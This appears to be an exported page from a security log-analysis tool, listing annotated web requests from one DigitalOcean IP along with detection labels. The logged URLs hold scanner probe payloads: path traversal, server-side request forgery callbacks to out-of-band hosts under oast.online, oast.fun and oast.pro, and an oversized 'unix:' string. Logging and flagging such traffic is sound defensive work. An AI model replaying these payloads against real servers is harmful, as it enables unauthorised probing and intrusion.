
Log Explorer

Fact drill-down for 68.183.143.133
Risk 12 LOW | Scope All time | All-time facts 240 | In-scope 240 | Filtered 240 | Seen 2025-03-10 2025-03-10

Annotated access events

Showing page 1 / 5 — total 240 rows
#1 2025-03-10 00:50:05 event 3081495 POST 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15
Annotation facts
label
observed
rule
base_observed
conf
details
url
/wms
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#2 2025-03-10 00:50:05 event 3081494 POST 404 bytes 7903
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/geoserver/wms
referer
-
UA
Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#3 2025-03-10 00:48:39 event 3081452 POST 404 bytes 7901
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Annotation facts
label
observed
rule
base_observed
conf
details
url
/servlets/OmaDsServlet
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#4 2025-03-10 00:46:57 event 3081435 GET 400 bytes 163
ann base label observed
Annotation facts
label
observed
rule
base_observed
conf
details
url
/?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
referer
-
UA
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#5 2025-03-10 00:44:23 event 3081405 POST 404 bytes 7899
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Annotation facts
label
observed
rule
base_observed
conf
details
url
/api/v4/ci/lint?include_merged_yaml=true
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#6 2025-03-10 00:44:20 event 3081404 POST 403 bytes 974
ann base label observed
Request event observed
/
referer
-
UA
Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/
referer
-
UA
Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#7 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann trav 26 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
trav
rule
trav:mixed_separators
conf
90.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#8 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann trav 28 label trav
Request Path traversal / LFI indicator detected
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
trav
rule
trav:dotdot_slash
conf
92.00
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
Path traversal / LFI indicator detected
details
Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#9 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann sfp 34 label sensitive_file
Request Directory traversal indicator
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
sensitive_file
rule
sfp:traversal
conf
86.00
details
Traversal sequences were present (raw or encoded). Snippet='action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4'
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
Directory traversal indicator
details
Traversal sequences were present (raw or encoded). Snippet='action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4'
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#10 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann ref 8 label ref
Request Multiple redirect parameters observed in one request
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
ref
rule
ref:multi_redirect_chain
conf
80.00
details
Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
Multiple redirect parameters observed in one request
details
Chaining multiple redirect parameters is common in affiliate/phishing plumbing and in open-redirect exploitation attempts.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#11 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#12 2025-03-10 00:44:16 event 3081403 POST 404 bytes 7898
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/dana-ws/saml20.ws
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#13 2025-03-10 00:44:16 event 3081402 GET 404 bytes 7901
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
Annotation facts
label
observed
rule
base_observed
conf
details
url
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:70.0) Gecko/20100101 Firefox/70.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#14 2025-03-10 00:44:16 event 3081401 POST 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/xmlrpc/pingback
referer
-
UA
Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#15 2025-03-10 00:44:15 event 3081400 POST 404 bytes 7900
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
Annotation facts
label
observed
rule
base_observed
conf
details
url
/client
referer
-
UA
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#16 2025-03-10 00:44:13 event 3081397 GET 404 bytes 7898
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
url
/shindig/gadgets/proxy?container=default&url=http://oast.pro
referer
-
UA
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#17 2025-03-10 00:44:13 event 3081399 POST 404 bytes 7900
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/connect/register
referer
-
UA
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#18 2025-03-10 00:44:13 event 3081398 GET 404 bytes 7899
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey&txtSearchfor&selfor=Business+location&btnSubmit=Search&operator=http://cv70744c1utej8crv3ggfmhbn1azcgzso.oast.online
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#19 2025-03-10 00:44:13 event 3081397 GET 404 bytes 7898
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/shindig/gadgets/proxy?container=default&url=http://oast.pro
referer
-
UA
Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#20 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann scan_velocity 36 label scan_velocity
Request Scan-velocity indicator: scanv:rpm
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
scan_velocity
rule
scanv:rpm
conf
90.00
details
rpm_equiv=84.7; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
Scan-velocity indicator: scanv:rpm
details
rpm_equiv=84.7; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#21 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann scan_velocity 36 label scan_velocity
Request Scan-velocity indicator: scanv:method_enum
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
scan_velocity
rule
scanv:method_enum
conf
90.00
details
non_safe_methods=['POST', 'PUT']; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
Scan-velocity indicator: scanv:method_enum
details
non_safe_methods=['POST', 'PUT']; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#22 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann scan_velocity 36 label scan_velocity
Request Scan-velocity indicator: scanv:404_ratio
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
scan_velocity
rule
scanv:404_ratio
conf
90.00
details
404=99/127(0.78); score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
Scan-velocity indicator: scanv:404_ratio
details
404=99/127(0.78); score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#23 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann scan_velocity 36 label scan_velocity
Request Scan-velocity indicator: scanv:ext_enum
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
scan_velocity
rule
scanv:ext_enum
conf
90.00
details
ext_hits=16; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
Scan-velocity indicator: scanv:ext_enum
details
ext_hits=16; score=18; window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#24 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann scan_velocity label scan_velocity
Request Scan-velocity window summary
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
scan_velocity
rule
scanv:window
conf
details
window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
Scan-velocity window summary
details
window=90s; total=127; rpm_equiv=84.7; upm_nonstatic_equiv=42.7; 404=99/127(0.78); ext_hits=16; ua_sig=0; methods=['GET', 'POST', 'PUT']
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#25 2025-03-10 00:44:12 event 3081394 GET 404 bytes 7898
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
url
/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#26 2025-03-10 00:44:12 event 3081396 POST 404 bytes 7897
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Annotation facts
label
observed
rule
base_observed
conf
details
url
/chat/completions
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#27 2025-03-10 00:44:12 event 3081395 GET 404 bytes 7898
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/ui/vropspluginui/rest/services/getvcdetails
referer
-
UA
Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#28 2025-03-10 00:44:12 event 3081394 GET 404 bytes 7898
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Annotation facts
label
observed
rule
base_observed
conf
details
url
/Umbraco/feedproxy.aspx?url=http://cv70744c1utej8crv3ggmrqpdkcd8b5us.oast.online
referer
-
UA
Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#29 2025-03-10 00:44:11 event 3081393 GET 404 bytes 7900
ann base label observed
Request event observed
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20
Annotation facts
label
observed
rule
base_observed
conf
details
url
/registry/machine?app=cFW3h&appType=0&version=0&hostname=2kxqm&ip=cv70744c1utej8crv3gg14jtcptptz1jz.oast.online&port=0
referer
-
UA
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20
summary
event observed
details
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
#30 2025-03-10 00:44:10 event 3081392 GET 200 bytes 7219
ann ref 9 label ref
Request Open-redirect style parameter points to an external URL
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36
Annotation facts
label
ref
rule
ref:open_redirect_param
conf
85.00
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
url
/?u=http://cv70744c1utej8crv3ggdtt4ny7kgecno.oast.online/&href=http://cv70744c1utej8crv3ggoz4exqi979mhr.oast.online/&action=http://cv70744c1utej8crv3gg5ck8icnq7wmgt.oast.online/&host=cv70744c1utej8crv3ggtgro1fa99nc98.oast.online&http_host=cv70744c1utej8crv3ggyuwsmknqcip8y.oast.online&email=root@cv70744c1utej8crv3ggir7gpqtbmt5ni.oast.online&url=http://cv70744c1utej8crv3ggn61ihpb49oop5.oast.online/&load=http://cv70744c1utej8crv3gg5xmg1oga8iz61.oast.online/&preview=http://cv70744c1utej8crv3ggh6iecymkujif7.oast.online/&target=http://cv70744c1utej8crv3gggo1tqnjsk6rx1.oast.online/&proxy=http://cv70744c1utej8crv3gga86k6bznxdqc6.oast.online/&from=http://cv70744c1utej8crv3ggpazyir5n6hj7d.oast.online/&src=http://cv70744c1utej8crv3gg3ofh5io7q66zy.oast.online/&ref=http://cv70744c1utej8crv3gg7qzm4w4uni7ow.oast.online/&referrer=http://cv70744c1utej8crv3ggdttoyykbwiubh.oast.online/
referer
-
UA
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/120.0.0.0 Safari/537.36
summary
Open-redirect style parameter points to an external URL
details
A redirect-capable query parameter contains an absolute (external) URL. This is commonly used in phishing chains and open-redirect probing.
subnet
68.183.143.0/24
asn
14061 — DigitalOcean, LLC
geo
United States, New Jersey, North Bergen
org
DigitalOcean, LLC
